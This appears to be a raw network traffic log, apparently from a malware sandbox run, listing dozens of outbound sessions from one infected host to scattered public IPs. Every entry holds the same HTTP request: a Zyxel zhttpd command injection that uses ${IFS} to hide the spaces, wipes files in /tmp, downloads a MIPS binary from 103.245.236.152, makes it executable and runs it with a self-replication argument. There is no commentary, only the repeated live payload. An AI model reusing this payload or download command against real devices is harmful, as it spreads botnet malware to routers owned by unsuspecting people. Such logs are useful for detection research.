                                        Jan 14, 2024 16:18:35.229938030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1786192.168.2.1346618112.87.213.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229988098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1787192.168.2.135043644.46.204.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230048895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1788192.168.2.135316861.9.175.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230087996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1789192.168.2.1355432102.231.232.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230113983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1790192.168.2.134453058.91.32.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230146885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1791192.168.2.133296292.40.88.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230215073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1792192.168.2.1345382209.60.182.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230252028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1793192.168.2.1335446169.176.153.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230305910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1794192.168.2.1346866114.218.227.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230345964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1795192.168.2.1351244121.162.78.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230365992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1796192.168.2.133918248.237.234.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230407953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1797192.168.2.134212486.167.10.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230470896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1798192.168.2.133872846.168.54.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230485916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1799192.168.2.133867486.152.106.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230550051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1800192.168.2.1360362137.76.193.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230572939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1801192.168.2.133279068.155.116.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230614901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1802192.168.2.135928884.138.75.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230640888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1803192.168.2.1333802132.52.21.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230704069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1804192.168.2.1351442181.8.34.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230736971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1805192.168.2.1337652113.34.112.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230777025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1806192.168.2.133390476.95.77.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230829000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1807192.168.2.1337500137.12.133.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230869055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1808192.168.2.1344540107.165.50.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230894089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1809192.168.2.135005653.4.44.92443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230937958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1810192.168.2.134010218.254.10.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.230988979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1811192.168.2.1356586172.56.166.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231045008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1812192.168.2.1353112134.97.116.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231070995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1813192.168.2.136008667.215.225.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231118917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1814192.168.2.1353010122.149.133.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231165886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1815192.168.2.134599042.65.25.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231168032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1816192.168.2.1353052182.188.25.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231226921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1817192.168.2.133826045.142.204.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231282949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1818192.168.2.1360486213.153.108.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231302023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1819192.168.2.1334528183.208.64.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231363058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1820192.168.2.1360478130.110.196.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231405973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1821192.168.2.135481247.226.220.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231446981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1822192.168.2.1358298148.213.225.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231507063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1823192.168.2.135282053.252.214.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231540918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1824192.168.2.133857851.203.12.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231570005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1825192.168.2.1343718106.156.185.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231636047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1826192.168.2.1337148203.4.145.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231677055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1827192.168.2.1339116210.67.30.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231719017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1828192.168.2.134469034.80.70.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231750965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1829192.168.2.1335646125.140.80.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231798887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1830192.168.2.1351600136.1.208.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231832027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1831192.168.2.1349648212.159.157.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231882095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1832192.168.2.1351872116.112.11.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231930017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1833192.168.2.1358764121.199.80.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.231941938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1834192.168.2.1343988130.78.210.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232009888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1835192.168.2.134188239.100.119.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232042074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1836192.168.2.1341938197.46.215.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232083082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1837192.168.2.13540464.95.21.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232105017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1838192.168.2.13557321.125.4.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232120991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1839192.168.2.135129231.183.79.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232153893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1840192.168.2.1359206211.125.135.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232188940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1841192.168.2.1343226103.2.148.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232249022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1842192.168.2.133807880.35.189.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232285976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1843192.168.2.1354692169.71.143.12443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232321978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1844192.168.2.1352560204.252.247.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232358932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1845192.168.2.136061686.121.141.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232404947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1846192.168.2.133797089.175.176.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232456923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1847192.168.2.134830248.99.82.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232503891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1848192.168.2.1336592173.165.171.239443
                                        TimestampBytes transferredDirectionData
